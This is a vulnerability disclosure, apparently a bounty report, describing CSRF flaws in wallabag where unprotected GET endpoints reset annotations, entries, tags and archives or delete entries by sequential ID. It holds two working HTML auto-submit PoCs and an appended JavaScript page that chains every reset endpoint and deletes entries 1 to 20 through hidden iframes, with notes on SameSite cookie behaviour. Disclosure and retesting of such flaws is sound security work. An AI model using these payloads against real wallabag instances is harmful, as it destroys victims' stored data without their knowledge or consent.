I find wallabag suffering from several Cross-Site Request Forgery (CSRF) vulnerabilities which allow attackers to arbitrarily delete the victim user's annotations, entries and tags by a GET request to /reset/annotations, /reset/entries, /reset/tags, /reset/archived, as well as /delete/[Entry ID], in which the [Entry ID] can be estimated easily as it is indexed from 1 and increased by 1 when a new entry is added. Because these are state-changing GET requests without CSRF protection, the attackers can simply craft all these dangerous actions in one link and then drive the victim to delete them all in one click.
For /reset/annotations
Log in as a user.
Open the following HTML file in the browser.
// PoC.js
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/reset/annotations">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
For /reset/entries, /reset/tags and /reset/archived, we can simply modify the above PoC by changing annotations to entries, tags or archived.
For /delete/[Entry ID]
Log in as a user.
Find an entry ID; here we find the [Entry ID]=10.
Open the following HTML file in the browser.
// PoC.js
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/delete/10">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
The added entry has been deleted.
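The report says all of these actions can be chained into one link. The script below is an added example of that chain, not code from the report or from wallabag: it builds the full list of state-changing GET targets (the four /reset/ endpoints plus /delete/1 .. /delete/N, exploiting the sequential entry IDs) and, when run in a browser, loads each one in a hidden iframe. The base URL http://example.com and the entry-ID range of 20 are assumptions carried over from the PoC placeholders above.

```javascript
// Added example (not wallabag code): chain every state-changing GET from the
// report into a single page. Base URL and ID range are placeholders.

const RESET_TYPES = ['annotations', 'entries', 'tags', 'archived'];

// Build the target list: /reset/<type> for each reset endpoint, then
// /delete/<id> for ids 1..maxEntryId. Entry IDs start at 1 and increase by
// one per added entry, so a small guessed range covers a typical account.
function buildCsrfTargets(base, maxEntryId) {
  if (!Number.isInteger(maxEntryId) || maxEntryId < 0) {
    throw new RangeError('maxEntryId must be a non-negative integer');
  }
  const origin = base.replace(/\/+$/, ''); // tolerate a trailing slash
  const targets = RESET_TYPES.map((type) => `${origin}/reset/${type}`);
  for (let id = 1; id <= maxEntryId; id++) {
    targets.push(`${origin}/delete/${id}`);
  }
  return targets;
}

// Load each target in a hidden iframe so the victim's browser sends the GETs
// with the victim's cookies. Caveat: browsers that default cookies to
// SameSite=Lax do NOT attach the session cookie to iframe loads, so this
// variant only works where the cookie is explicitly SameSite=None. The
// report's form-based PoC is a top-level navigation, which Lax cookies do
// accompany, so that one keeps working under the Lax default.
// Returns the number of frames injected (0 outside a browser).
function fireTargets(targets, doc = globalThis.document) {
  if (!doc) return 0; // no DOM available, e.g. running under Node
  let injected = 0;
  for (const url of targets) {
    const frame = doc.createElement('iframe');
    frame.style.display = 'none';
    frame.src = url;
    doc.body.appendChild(frame);
    injected++;
  }
  return injected;
}

// Browser entry point: hide the attacker page's path in the URL bar, as the
// original PoC does, then fire everything. Skipped when there is no window.
if (typeof window !== 'undefined') {
  history.pushState('', '', '/');
  fireTargets(buildCsrfTargets('http://example.com', 20));
}
```

Because /reset/entries already removes every entry, the /delete/<id> requests are only needed where the reset endpoint is unavailable; the list keeps both so the page exercises every endpoint the report names. A retest after a fix should find that each of these URLs either rejects GET (405) or demands a CSRF token the attacker's page cannot supply.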